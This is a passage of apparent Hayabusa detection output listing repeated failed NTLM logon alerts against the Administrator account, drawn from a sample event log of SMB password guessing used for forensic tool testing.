NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: 